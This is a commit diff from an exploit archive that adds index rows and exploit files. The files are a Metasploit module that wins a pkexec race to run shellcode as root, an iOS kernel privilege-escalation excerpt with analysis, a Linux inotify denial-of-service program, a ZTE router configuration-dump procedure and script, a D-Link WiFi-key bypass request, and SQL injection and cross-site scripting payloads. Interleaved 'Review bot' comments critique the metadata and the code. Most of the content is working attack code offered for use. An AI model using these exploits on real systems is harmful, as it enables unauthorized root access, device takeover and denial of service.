Updated 10_22_2014

This commit is contained in:
Offensive Security 2014-10-22 04:44:36 +00:00
parent 195bc38235
commit a7cf4f066c
18 changed files with 1291 additions and 0 deletions


@ -31228,6 +31228,7 @@ id,file,description,date,author,platform,type,port
34677,platforms/php/webapps/34677.txt,"WebStatCaffe stat/pageviewers.php date Parameter XSS",2009-08-29,Moudi,php,webapps,0
34678,platforms/php/webapps/34678.txt,"WebStatCaffe stat/pageviewerschart.php date Parameter XSS",2009-08-29,Moudi,php,webapps,0
34679,platforms/php/webapps/34679.txt,"WebStatCaffe stat/referer.php date Parameter XSS",2009-08-29,Moudi,php,webapps,0
34680,platforms/hardware/webapps/34680.txt,"ZTE ZXDSL-931VII - Unauthenticated Configuration Dump",2014-09-16,"L0ukanik0-s S0kniaku0l",hardware,webapps,0
34681,platforms/php/webapps/34681.txt,"Wordpress Slideshow Gallery 1.4.6 - Shell Upload (Python Exploit)",2014-09-16,"Claudio Viviani",php,webapps,0
34682,platforms/ios/webapps/34682.txt,"USB&WiFi Flash Drive 1.3 iOS - Code Execution Vulnerability",2014-09-16,Vulnerability-Lab,ios,webapps,8080
34683,platforms/php/webapps/34683.txt,"e-soft24 Article Directory Script 'q' Parameter Cross Site Scripting Vulnerability",2009-08-30,"599eme Man",php,webapps,0
@ -31333,6 +31334,7 @@ id,file,description,date,author,platform,type,port
34796,platforms/multiple/remote/34796.txt,"Oracle MySQL Prior to 5.1.50 Privilege Escalation Vulnerability",2010-08-03,"Libing Song",multiple,remote,0
34797,platforms/php/webapps/34797.txt,"SurgeMail SurgeWeb 4.3e Cross Site Scripting Vulnerability",2010-10-04,"Kerem Kocaer",php,webapps,0
34798,platforms/php/webapps/34798.txt,"ITS SCADA Username SQL Injection Vulnerability²",2010-10-04,"Eugene Salov",php,webapps,0
34800,platforms/php/webapps/34800.txt,"Typo3 JobControl 2.14.0 - Cross Site Scripting / SQL Injection",2014-09-27,"Adler Freiheit",php,webapps,0
34802,platforms/hardware/remote/34802.html,"Research In Motion BlackBerry Device Software <= 4.7.1 Cross Domain Information Disclosure Vulnerability",2010-10-04,"599eme Man",hardware,remote,0
34803,platforms/php/webapps/34803.txt,"Online Guestbook Pro 5.1 'ogp_show.php' Cross Site Scripting Vulnerability",2009-07-09,Moudi,php,webapps,0
34804,platforms/php/webapps/34804.txt,"Rentventory 'index.php' Multiple Cross Site Scripting Vulnerabilities",2009-07-07,"599eme Man",php,webapps,0
@ -31521,3 +31523,18 @@ id,file,description,date,author,platform,type,port
35004,platforms/php/webapps/35004.txt,"CompactCMS 1.4.1 Multiple Cross Site Scripting Vulnerabilities",2010-11-18,"High-Tech Bridge SA",php,webapps,0
35005,platforms/windows/remote/35005.html,"WebKit Insufficient Entropy Random Number Generator Weakness (1)",2010-11-18,"Amit Klein",windows,remote,0
35006,platforms/windows/remote/35006.html,"WebKit Insufficient Entropy Random Number Generator Weakness (2)",2010-11-18,"Amit Klein",windows,remote,0
35007,platforms/windows/remote/35007.c,"Native Instruments Multiple Products DLL Loading Arbitrary Code Execution Vulnerability",2010-11-19,"Gjoko Krstic",windows,remote,0
35008,platforms/cgi/webapps/35008.txt,"Hot Links SQL 3.2 'report.cgi' SQL Injection Vulnerability",2010-11-22,"Aliaksandr Hartsuyeu",cgi,webapps,0
35009,platforms/php/webapps/35009.txt,"AuraCMS 1.62 'pdf.php' SQL Injection Vulnerability",2010-11-22,"Don Tukulesto",php,webapps,0
35010,platforms/osx/local/35010.c,"Apple iOS <= 4.0.2 Networking Packet Filter Rules Local Privilege Escalation Vulnerability",2010-11-22,Apple,osx,local,0
35011,platforms/linux/remote/35011.txt,"Apache Tomcat <= 7.0.4 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities",2010-11-22,"Adam Muntner",linux,remote,0
35012,platforms/multiple/webapps/35012.txt,"ZyXEL P-660R-T1 V2 'HomeCurrent_Date' Parameter Cross-Site Scripting Vulnerability",2010-11-23,"Usman Saeed",multiple,webapps,0
35013,platforms/linux/dos/35013.c,"Linux Kernel 2.6.x 'inotify_init()' Memory Leak Local Denial of Service Vulnerability",2010-11-24,"Vegard Nossum",linux,dos,0
35014,platforms/hardware/remote/35014.txt,"D-Link DIR-300 WiFi Key Security Bypass Vulnerability",2010-11-24,"Gaurav Saha",hardware,remote,0
35015,platforms/cgi/webapps/35015.txt,"SimpLISTic SQL 2.0 'email.cgi' Cross Site Scripting Vulnerability",2010-11-24,"Aliaksandr Hartsuyeu",cgi,webapps,0
35016,platforms/php/webapps/35016.txt,"Easy Banner 2009.05.18 member.php Multiple Parameter SQL Injection Authentication Bypass",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0
35017,platforms/php/webapps/35017.txt,"Easy Banner 2009.05.18 index.php Multiple Parameter XSS",2010-11-26,"Aliaksandr Hartsuyeu",php,webapps,0
35019,platforms/windows/local/35019.py,"Windows OLE Package Manager SandWorm Exploit",2014-10-20,"Vlad Ovtchinikov",windows,local,0
35020,platforms/win32/local/35020.rb,"MS14-060 Microsoft Windows OLE Package Manager Code Execution",2014-10-20,metasploit,win32,local,0
35021,platforms/linux/local/35021.rb,"Linux PolicyKit Race Condition Privilege Escalation",2014-10-20,metasploit,linux,local,0
35022,platforms/php/webapps/35022.txt,"4homepages 4images 1.7.x 'categories.php' Parameter SQL Injection Vulnerability",2010-11-29,"Ahmed Atif",php,webapps,0
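Review bot: The platform field disagrees between the two new rows for the same MS14-060 OLE Package Manager issue: row 35019 is filed as `windows` under `platforms/windows/local/`, while row 35020 is filed as `win32` under `platforms/win32/local/`, so a consumer filtering the index on either value sees only one of the pair. Unless `win32` is a deliberate distinct value in this index (not visible from this hunk), the second row should be normalised to `windows` and the file moved to match. Row 35010 credits `Apple` as the author, whereas the text at the end of `platforms/osx/local/35010.c` in this same commit attributes the exploit to comex; the author field should name the actual author.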



@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45000/info
Hot Links SQL is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Hot Links SQL 3.2.0 is vulnerable; other versions may also be affected.
http://www.example.com/report.cgi?id=999; or 'a'='a


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45040/info
SimpLISTic SQL is prone to a cross-site-scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
SimpLISTic SQL 2.0 is vulnerable; other versions may also be affected.
Email: email@example.com&lt;/textarea&gt;<script>alert(&#039;XSS vulnerability&#039;)</script>


@ -0,0 +1,19 @@
source: http://www.securityfocus.com/bid/45038/info
The D-Link DIR-300 wireless router is prone to a security-bypass vulnerability.
Remote attackers can exploit this issue to modify the WiFi key and possibly other configuration settings. Successful exploits will lead to other attacks.
POST http://www.example.com/bsc_wlan.php HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml
Accept-Charset: ISO-8859-1,utf-8
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1000
ACTION_POST=final&f_enable=1&f_wps_enable=1&f_ssid=KingGeorgeV&f_channel=6&f_auto_channel=0&f_super_g=&f_xr=&f_txrate=0&f_wmm_enable=0&f_ap_hidden=0&f_authentication=7&f_cipher=2&f_wep_len=&f_wep_format=&f_wep_def_key=&f_wep=&f_wpa_psk_type=1&f_wpa_psk=
<<the_wifi_password_here>>&f_radius_ip1=&f_radius_port1=&f_radius_secret1=


@ -0,0 +1,94 @@
# Exploit Title: ZTE ZXDSL-931VII Unauthenticated Configuration Dump
# Google Dork: use your imagination
# Date: 09-12-2014
# Exploit Author: L0ukanik0sGR
# Vendor Homepage: www.zte.com.cn
# Software Link: https://www.ote.gr/web/guest/help-and-support/internet/vdsl/-/support/article/870213%3Bjsessionid=01605E58A483CF54BB0E95208F531764.node3_1_OTEGR?! original firmware for that device could not be found but it works to all zte devices with custom ISP firmware :)
# Version: 931vii,w300 and all zte products running that firmware
# Tested on: linux other os compatible
# CVE : None yet it's a 0day
ZTE ZXDSL-931VII Unauthenticated Configuration Dump
Unauthenticated Configuration File Download and
Decompression of the _config.bin file
by L0ukanik0s,GR 2014,l0ukanik0s@hotmail.com
Exploit PoC:
1. Go to http://router-ip/ manager_dev_config_t.gch
2.
Click on 'Backup Configuration' and obtain the _config.bin
3.
Download python script from http://pastebin.com/i6dfsL5D
4.
Then compile and run zte-0day.py (root@l0ukanik0s:~# python zte-0day.py)
5.
Insert the path of the _config.bin file hit 'ENTER'
6.
Enjoy your configuration dump
#!/usr/bin/env python
import zlib
#scripte originated from http://reverseengineering.stackexchange.com/questions/3593/re-compressed-backup-file-router-linux-based-so-is-it-compresed-with-zlib
print "################################################"
print "# THe W0lf is so close #"
print "# ZTE 931Vii Router configuration unpacker #"
print "# Find configuration file @ #"
print "# http://192.168.1.1/manager_dev_config_t.gch #"
print "# L0ukanik0s 2014 Hack-Hosting #"
print "# l0ukanik0s@hotmail.com #"
print "################################################"
print "Enter your config.bin path: e.g root@l0ukanik0s:~#/Desktop/931router_config.bin"
configfile = raw_input("File Path :").strip()
magic_numbers = ['\x78\xDA']
filename = configfile
infile = open(filename, 'r')
data = infile.read()
pos = 0
found = False
while pos < len(data):
window = data[pos:pos+2]
for marker in magic_numbers:
if window == marker:
found = True
start = pos
print "Start of zlib %s" % pos
rest_of_data = data[start:]
decomp_obj = zlib.decompressobj()
uncompressed_msg = decomp_obj.decompress(rest_of_data)
print "Configuration of ZTE 931 File Content: %s" % uncompressed_msg
break
if pos == len(data):
break
pos += 1
if found:
header = data[:start]
footer = decomp_obj.unused_data
if not found:
print "Sorry, no zlib found."
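Review bot: The header gives no disclosure information: the `# CVE : None yet it's a 0day` line and the `# Software Link:` line (an ISP support page rather than the vendor) are all the reader gets, and there is no vendor-notification date, vendor response or fix status anywhere in the file, whereas the MSA-2014-02 advisory added in the same commit carries a `Disclosure timeline:` section. Adding `# Vendor notified:` and `# Fix status:` lines to the header, plus a one-line mitigation for operators (restricting who can reach the router's management pages until a fix exists), would let readers judge their exposure. Separately, the unpacker opens the backup with `infile = open(filename, 'r')` and never closes it; the input is a binary `.bin`, so it should be `with open(filename, 'rb') as infile:`, which matters given the `# Tested on: linux other os compatible` claim since text mode rewrites line endings on Windows.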

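--- /dev/null
+++ b/platforms/linux/dos/35013.c
@@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/45036/info
+The Linux kernel is prone to a local denial-of-service vulnerability.
+Attackers can exploit this issue to cause an out-of-memory condition, denying service to legitimate users.
+#include <sys/inotify.h>
+#include <unistd.h>
+int main(int argc, char *argv[])
+{
+int fds[2];
+/* Circumvent max inotify instances limit */
+while (pipe(fds) != -1)
+;
+while (1)
+inotify_init();
+return 0;
+}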
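Review bot: The advisory text at the top of the file (`source:` through `Attackers can exploit this issue to cause an out-of-memory condition...`) names no affected or fixed kernel version, while the index row for 35013 says `Linux Kernel 2.6.x`; the other securityfocus-derived files in this commit end their description with an `X is vulnerable; other versions may also be affected.` line, and this one should carry the equivalent so a reader can tell whether a given kernel is in scope. The comment `/* Circumvent max inotify instances limit */` states intent but not the condition the PoC relies on; a short note on why the descriptor table is exhausted first (presumably so that `inotify_init()` takes its failure path) would make the file self-explanatory. `argc` and `argv` are unused, so the signature can simply be `int main(void)`.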

platforms/linux/local/35021.rb Executable file

@ -0,0 +1,354 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class Metasploit4 < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Exploit::EXE
include Msf::Post::File
include Msf::Exploit::Local::Linux
def initialize(info = {})
super(update_info(info,
'Name' => 'Linux PolicyKit Race Condition Privilege Escalation',
'Description' => %q(
A race condition flaw was found in the PolicyKit pkexec utility and polkitd
daemon. A local user could use this flaw to appear as a privileged user to
pkexec, allowing them to execute arbitrary commands as root by running
those commands with pkexec.
Those vulnerable include RHEL6 prior to polkit-0.96-2.el6_0.1 and Ubuntu
libpolkit-backend-1 prior to 0.96-2ubuntu1.1 (10.10) 0.96-2ubuntu0.1
(10.04 LTS) and 0.94-1ubuntu1.1 (9.10)
),
'License' => MSF_LICENSE,
'Author' =>
[
'xi4oyu', # exploit
'0a29406d9794e4f9b30b3c5d6702c708' # metasploit module
],
'Platform' => [ 'linux'],
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' =>
[
[ 'Linux x86', { 'Arch' => ARCH_X86 } ],
[ 'Linux x64', { 'Arch' => ARCH_X86_64 } ]
],
'DefaultTarget' => 0,
'References' =>
[
[ 'CVE', '2011-1485' ],
[ 'EDB', '17942' ],
[ 'OSVDB', '72261' ]
],
'DisclosureDate' => "Apr 01 2011"
))
register_options([
OptString.new("WritableDir", [ true, "A directory where we can write files (must not be mounted noexec)", "/tmp" ]),
OptInt.new("Count", [true, "Number of attempts to win the race condition", 500 ]),
OptInt.new("ListenerTimeout", [true, "Number of seconds to wait for the exploit", 60]),
OptBool.new("DEBUG", [ true, "Make the exploit executable be verbose about what it's doing", false ])
])
end
def executable_path
@executable_path ||= datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
@executable_path
end
def exploit
main = %q^
/*
* Exploit Title: pkexec Race condition (CVE-2011-1485) exploit
* Author: xi4oyu
* Tested on: rhel 6
* CVE : 2011-1485
* Linux pkexec exploit by xi4oyu , thx dm@0x557.org * Have fun~
* U can reach us @ http://www.wooyun.org :)
* 0a2940: some changes
*/
/*
#include <stdio.h>
#include <limits.h>
#include <time.h>
#include <unistd.h>
#include <termios.h>
#include <sys/stat.h>
#include <errno.h>
#include <poll.h>
#include <sys/types.h>
#include <stdlib.h>
#include <string.h>
*/
#define dprintf
#define NULL ((void*)0)
#define MAP_PRIVATE 0x02
#define MAP_FIXED 0x10
#define MAP_ANONYMOUS 0x20
#define MAP_ANON MAP_ANONYMOUS
#define MAP_FAILED ((void *)-1)
#define PROT_READ 0x1
#define PROT_WRITE 0x2
#define PROT_EXEC 0x4
#define O_CREAT 64
#define O_RDWR 2
#define POLLRDNORM 0x0040
typedef int __pid_t;
typedef int __time_t;
typedef
struct {
long __val[2];
} __quad_t;
typedef __quad_t __dev_t;
typedef long __ino_t;
typedef unsigned long __mode_t;
typedef long __nlink_t;
typedef unsigned int __uid_t;
typedef unsigned int __gid_t;
typedef long long __off_t;
typedef long __blksize_t;
typedef long long __blkcnt_t;
struct _stat_buff {
__dev_t st_dev; /* Device. */
unsigned short int __pad1;
__ino_t st_ino; /* File serial number. */
__mode_t st_mode; /* File mode. */
__nlink_t st_nlink; /* Link count. */
__uid_t st_uid; /* User ID of the file's owner. */
__gid_t st_gid; /* Group ID of the file's group.*/
__dev_t st_rdev; /* Device number, if device. */
unsigned short int __pad2;
__off_t st_size; /* Size of file, in bytes. */
__blksize_t st_blksize; /* Optimal block size for I/O. */
__blkcnt_t st_blocks; /* Number 512-byte blocks allocated. */
__time_t st_atime; /* Time of last access. */
unsigned long int st_atimensec; /* Nscecs of last access. */
__time_t st_mtime; /* Time of last modification. */
unsigned long int st_mtimensec; /* Nsecs of last modification. */
__time_t st_ctime; /* Time of last status change. */
unsigned long int st_ctimensec; /* Nsecs of last status change. */
unsigned long int __unused4;
unsigned long int __unused5;
};
struct _pollfd {
int fd; /* file descriptor */
short events; /* requested events */
short revents; /* returned events */
};
typedef unsigned long size_t;
extern void *mmap(void *__addr, size_t __len, int __prot, int __flags, int __fd, __off_t __offset);
extern int mprotect(void *__addr, size_t __len, int __prot);
extern void exit(int __status);
extern int printf(const char *__format, ...);
extern __pid_t fork(void);
extern __time_t time(__time_t *t);
extern __pid_t getpid(void);
extern __uid_t geteuid(void);
extern void srand(unsigned int seed);
extern int snprintf(char *str, size_t size, const char *format, ...);
extern int pipe(int pipefd[2]);
extern int close(int fd);
extern void write(int fd, const void *buf, size_t count);
extern int dup2(int oldfd, int newfd);
extern void perror(const char *__s);
extern void read(int fd, void *buf, size_t count);
extern int execve(const char *filename, char *const argv[], char *const envp);
extern int usleep(int usec);
extern void *memset(void *s, int c, size_t n);
extern void *memcpy(void * dst, const void *src, size_t n);
extern int poll(struct _pollfd *fds, unsigned int nfds, int timeout);
extern char *strstr(const char *haystack, const char *needle);
extern int rand(void);
extern int unlink(const char *__name);
int main(int argc,char *argv[], char ** envp)
{
__time_t tim_seed1;
__pid_t pid_seed2;
int result;
struct _stat_buff stat_buff;
char * chfn_path = "/usr/bin/chfn";
char * cmd_path = "";
char * pkexec_argv[] = {
"/usr/bin/pkexec",
"/bin/sh",
"-c",
cmd_path,
NULL
};
int pipe1[2];
int pipe2[2];
int pipe3[2];
__pid_t pid,pid2 ;
char * chfn_argv[] = {
"/usr/bin/chfn",
NULL
};
char buff[8];
char read_buff[4096];
char real_path[512];
int count = 0;
int flag = 0;
unsigned int usleep1 = 0;
unsigned int usleep2 = 0;
tim_seed1 = time(NULL);
pid_seed2 = getpid();
srand(tim_seed1+pid_seed2);
if(!geteuid()){
unlink(cmd_path);
SHELLCODE
int shellcode_size = 0;
int i;
unsigned long (*func)();
func = mmap(NULL, 0x1000,
PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS,
0, 0
);
mprotect(func, 4096, PROT_READ|PROT_WRITE|PROT_EXEC);
dprintf("Copying %d bytes of shellcode\n", shellcode_size);
//for (i = 0; i < shellcode_size; i++) {
//(char)func[i] = (char)shellcode[i];
memcpy(func,shellcode,shellcode_size);
//}
dprintf("Forking before calling shellcode: 0x%p\n", func);
if (fork()) {
exit(0);
}
func();
}
if(pipe(pipe1)){
perror("pipe");
exit(-2);
}
for(count = COUNT; count && !flag; count--){
dprintf("count %d usleep1 %d usleep2 %d\n",count,usleep1,usleep2);
pid = fork();
if( !pid ){
// Parent
if( !pipe(pipe2)){
if(!pipe(pipe3)){
pid2 = fork();
if(!pid2){
// Parent 2
close(1);
close(2);
close(pipe1[0]);
dup2(pipe1[1],2);
dup2(pipe1[1],1);
close(pipe1[1]);
close(pipe2[0]);
close(pipe3[1]);
write(pipe2[1],"\xFF",1);
read(pipe3[0],&buff,1);
execve(pkexec_argv[0],pkexec_argv,envp);
perror("execve pkexec");
exit(-3);
}
close(0);
close(1);
close(2);
close(pipe2[1]);
close(pipe3[0]);
read(pipe2[0],&buff,1);
write(pipe3[1],"\xFF",1);
usleep(usleep1+usleep2);
execve(chfn_argv[0],chfn_argv,envp);
perror("execve setuid");
exit(1);
}
}
perror("pipe3");
exit(1);
}
//Note: This is child, no pipe3 we use poll to monitor pipe1[0]
memset(pipe3,0,8);
struct _pollfd * pollfd = (struct pollfd *)(&pipe3);
pollfd->fd = pipe1[0];
pollfd->events = POLLRDNORM;
if(poll(pollfd,1,1000) < 0){
perror("poll");
exit(1);
}
if(pollfd->revents & POLLRDNORM ){
memset(read_buff,0,4096);
read(pipe1[0],read_buff,4095);
if( strstr(read_buff,"does not match")){
usleep1 += 100;
usleep2 = rand() % 1000;
}else{
if(usleep1 > 0){
usleep1 -= 100;
}
}
}
}
result = 0;
unlink(cmd_path);
return result;
}
^
main.gsub!(/SHELLCODE/, Rex::Text.to_c(payload.encoded, 64, "shellcode"))
main.gsub!(/shellcode_size = 0/, "shellcode_size = #{payload.encoded.length}")
main.gsub!(/cmd_path = ""/, "cmd_path = \"#{executable_path}\"")
main.gsub!(/COUNT/, datastore["Count"].to_s)
main.gsub!(/#define dprintf/, "#define dprintf printf") if datastore['DEBUG']
cpu = nil
if target['Arch'] == ARCH_X86
cpu = Metasm::Ia32.new
elsif target['Arch'] == ARCH_X86_64
cpu = Metasm::X86_64.new
end
begin
elf = Metasm::ELF.compile_c(cpu, main).encode_string
rescue
print_error "Metasm Encoding failed: #{$ERROR_INFO}"
elog "Metasm Encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}"
elog "Call stack:\n#{$ERROR_INFO.backtrace.join("\n")}"
return
end
print_status "Writing exploit executable to #{executable_path} (#{elf.length} bytes)"
rm_f executable_path
write_file(executable_path, elf)
output = cmd_exec("chmod +x #{executable_path}; #{executable_path}")
output.each_line { |line| print_debug line.chomp }
stime = Time.now.to_f
print_status "Starting the payload handler..."
until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f
Rex.sleep(1)
end
end
end
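Review bot: The process-role comments in the embedded C are inverted relative to fork() semantics: fork() returns 0 in the child, so the `if( !pid ){` branch labelled `// Parent` and the nested `if(!pid2){` branch labelled `// Parent 2` are the child and grandchild, while the code after them labelled `//Note: This is child, no pipe3 we use poll to monitor pipe1[0]` runs in the original parent; they should read `// Child`, `// Grandchild` and `// Parent: poll pipe1[0] for the child's output` so that whoever touches the pipe handshake closes the right ends. In the same block, `struct _pollfd * pollfd = (struct pollfd *)(&pipe3);` casts to the tag `pollfd`, which is never declared in this source (the system headers are commented out), while the declared type is `_pollfd`; the cast should match the declared tag. On the Ruby side, `executable_path` memoises with `||=` and then returns `@executable_path` again on the following line, so that second line is redundant.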


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45015/info
Apache Tomcat is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http:/www.example.com/html/sessions?path=/&sort=[xss]


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/45027/info
ZyXEL P-660R-T1 V2 is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/Forms/home_1?&HomeCurrent_Date=&#039;<sCript>alert(1);</ScRiPt>&#039;01%2F01%2F2000

platforms/osx/local/35010.c Executable file

@ -0,0 +1,185 @@
source: http://www.securityfocus.com/bid/45010/info
Apple iOS is prone to a local privilege-escalation vulnerability.
Local attackers running malicious code can exploit this issue to elevate their privileges. Successful attacks will completely compromise an affected device.
int main() {
unsigned int target_addr = CONFIG_TARGET_ADDR;
unsigned int target_addr_real = target_addr & ~1;
unsigned int target_pagebase = target_addr & ~0xfff;
unsigned int num_decs = (CONFIG_SYSENT_PATCH_ORIG - target_addr) >> 24;
assert(MAP_FAILED != mmap((void *) target_pagebase, 0x2000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE | MAP_FIXED, -1, 0));
unsigned short *p = (void *) target_addr_real;
if(target_addr_real & 2) *p++ = 0x46c0; // nop
*p++ = 0x4b00; // ldr r3, [pc]
*p++ = 0x4718; // bx r3
*((unsigned int *) p) = (unsigned int) &ok_go;
assert(!mprotect((void *)target_pagebase, 0x2000, PROT_READ | PROT_EXEC));
// Yes, reopening is necessary
pffd = open("/dev/pf", O_RDWR);
ioctl(pffd, DIOCSTOP);
assert(!ioctl(pffd, DIOCSTART));
unsigned int sysent_patch = CONFIG_SYSENT_PATCH;
while(num_decs--)
pwn(sysent_patch+3);
assert(!ioctl(pffd, DIOCSTOP));
close(pffd);
assert(!mlock((void *) ((unsigned int)(&ok_go) & ~0xfff), 0x1000));
assert(!mlock((void *) ((unsigned int)(&flush) & ~0xfff), 0x1000));
assert(!mlock((void *) target_pagebase, 0x2000));
#ifdef DEBUG
printf("ok\n"); fflush(stdout);
#endif
syscall(0);
#ifdef DEBUG
printf("we're out\n"); fflush(stdout);
#endif
//...
}
//...
static void pwn(unsigned int addr) {
struct pfioc_trans trans;
struct pfioc_trans_e trans_e;
struct pfioc_pooladdr pp;
struct pfioc_rule pr;
memset(&trans, 0, sizeof(trans));
memset(&trans_e, 0, sizeof(trans_e));
memset(&pr, 0, sizeof(pr));
trans.size = 1;
trans.esize = sizeof(trans_e);
trans.array = &trans_e;
trans_e.rs_num = PF_RULESET_FILTER;
memset(trans_e.anchor, 0, MAXPATHLEN);
assert(!ioctl(pffd, DIOCXBEGIN, &trans));
u_int32_t ticket = trans_e.ticket;
assert(!ioctl(pffd, DIOCBEGINADDRS, &pp));
u_int32_t pool_ticket = pp.ticket;
pr.action = PF_PASS;
pr.nr = 0;
pr.ticket = ticket;
pr.pool_ticket = pool_ticket;
memset(pr.anchor, 0, MAXPATHLEN);
memset(pr.anchor_call, 0, MAXPATHLEN);
pr.rule.return_icmp = 0;
pr.rule.action = PF_PASS;
pr.rule.af = AF_INET;
pr.rule.proto = IPPROTO_TCP;
pr.rule.rt = 0;
pr.rule.rpool.proxy_port[0] = htons(1);
pr.rule.rpool.proxy_port[1] = htons(1);
pr.rule.src.addr.type = PF_ADDR_ADDRMASK;
pr.rule.dst.addr.type = PF_ADDR_ADDRMASK;
//offsetof(struct pfr_ktable, pfrkt_refcnt[PFR_REFCNT_RULE]) = 0x4a4
pr.rule.overload_tbl = (void *)(addr - 0x4a4);
errno = 0;
assert(!ioctl(pffd, DIOCADDRULE, &pr));
assert(!ioctl(pffd, DIOCXCOMMIT, &trans));
pr.action = PF_CHANGE_REMOVE;
assert(!ioctl(pffd, DIOCCHANGERULE, &pr));
}
########################################################################################################
The vulnerability is located in the DIOCADDRULE ioctl handler, due to improper initialization of the overload_tbl field, which can be later exploited in the DIOCCHANGERULE handler. The following code snippet shows the relevant parts of those handlers :
########################################################################################################
//bsd/net/pf_ioctl.c
static int
pfioctl(dev_t dev, u_long cmd, caddr_t addr, int flags, struct proc *p)
{
//...
switch (cmd) {
//...
case DIOCADDRULE: {
struct pfioc_rule *pr = (struct pfioc_rule *)addr;
struct pf_ruleset *ruleset;
//...
//copy structure passed from userspace
bcopy(&pr->rule, rule, sizeof (struct pf_rule));
rule->cuid = kauth_cred_getuid(p->p_ucred);
rule->cpid = p->p_pid;
rule->anchor = NULL;
rule->kif = NULL;
TAILQ_INIT(&rule->rpool.list);
/* initialize refcounting */
rule->states = 0;
rule->src_nodes = 0;
rule->entries.tqe_prev = NULL;
//...
if (rule->overload_tblname[0]) {
if ((rule->overload_tbl = pfr_attach_table(ruleset,
rule->overload_tblname)) == NULL)
error = EINVAL;
else
rule->overload_tbl->pfrkt_flags |=
PFR_TFLAG_ACTIVE;
}
//...
case DIOCCHANGERULE: {
//...
if (pcr->action == PF_CHANGE_REMOVE) {
pf_rm_rule(ruleset->rules[rs_num].active.ptr, oldrule);
ruleset->rules[rs_num].active.rcount--;
}
//...
}
//...
}
################################################################################################
The rule field of the pfioc_rule structure passed from userland is copied into a kernel buffer, and then some of the structure fields are reinitialized. However, if rule->overload_tblname[0] is zero, the rule->overload_tbl pointer won't be initialized properly and will retain the value passed from userland. When the rule is removed, the pf_rm_rule function calls pfr_detach_table which in turn decrements a reference counter using the invalid pointer, allowing an arbitrary decrement anywhere in kernel memory :
##############################################################################################
//bsd/net/pf_ioctl.c
void
pf_rm_rule(struct pf_rulequeue *rulequeue, struct pf_rule *rule)
{
if (rulequeue != NULL) {
if (rule->states <= 0) {
/*
* XXX - we need to remove the table *before* detaching
* the rule to make sure the table code does not delete
* the anchor under our feet.
*/
pf_tbladdr_remove(&rule->src.addr);
pf_tbladdr_remove(&rule->dst.addr);
if (rule->overload_tbl)
pfr_detach_table(rule->overload_tbl);
}
//...
}
//bsd/net/pf_table.c
void
pfr_detach_table(struct pfr_ktable *kt)
{
lck_mtx_assert(pf_lock, LCK_MTX_ASSERT_OWNED);
if (kt->pfrkt_refcnt[PFR_REFCNT_RULE] <= 0)
printf("pfr_detach_table: refcount = %d.\n",
kt->pfrkt_refcnt[PFR_REFCNT_RULE]);
else if (!--kt->pfrkt_refcnt[PFR_REFCNT_RULE]) //arbitrary decrement happens here
pfr_setflags_ktable(kt, kt->pfrkt_flags&~PFR_TFLAG_REFERENCED);
}
###############################################################################################
In order to decrement the dword at address addr, the pwn function of comex's exploit sets the pr.rule.overload_tbl to addr minus 0x4a4, which is the value of offsetof(struct pfr_ktable, pfrkt_refcnt[PFR_REFCNT_RULE]) on a 32 bit architecture. The exploit decrement the syscall 0 handler address in the sysent array which holds function pointers for all system calls. A trampoline shellcode is mapped at a specific address chosen so that only the most significant byte of the original pointer has to be decremented (the minimum amount to move the pointer from kernel space down to user space). This trampoline will simply call the ok_go C function which will patch various functions in the kernel to perform the jailbreak : make code signing checks return true, disable W^X policy, and restore the overwritten syscall handler.
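Review bot: The file's own header (`source:` through `Successful attacks will completely compromise an affected device.`) states no affected or fixed iOS version, whereas the index row for 35010 scopes it to `Apple iOS <= 4.0.2`; the header should carry the equivalent `Apple iOS 4.0.2 and earlier are vulnerable; other versions may also be affected.` line used by the other advisories in this commit. The code is an excerpt — `//...` marks omissions inside `main` and after it, and `int main()` neither declares `(void)` nor returns a value — which the header should say explicitly so nobody tries to compile it as-is. The quoted kernel snippets from `bsd/net/pf_ioctl.c` and `bsd/net/pf_table.c` are not tied to an XNU version or tag; naming the release they were taken from would let a reader verify the fix in later sources.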

platforms/php/webapps/34800.txt Executable file

@ -0,0 +1,120 @@
Mogwai Security Advisory MSA-2014-02
----------------------------------------------------------------------
Title: JobControl (dmmjobcontrol) Multiple Vulnerabilities
Product: dmmjobcontrol (Typo3 Extension)
Affected versions: 2.14.0
Impact: high
Remote: yes
Product link: http://typo3.org/extensions/repository/view/dmmjobcontrol
Reported: 05/09/2014
by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)
Vendor's Description of the Software:
----------------------------------------------------------------------
JobControl (dmmjobcontrol) is a TYPO3 extension for showing jobs
("vacancies") on your website. It provides a list- and detail view and
the ability to search and apply for jobs. It can even make RSS feeds of
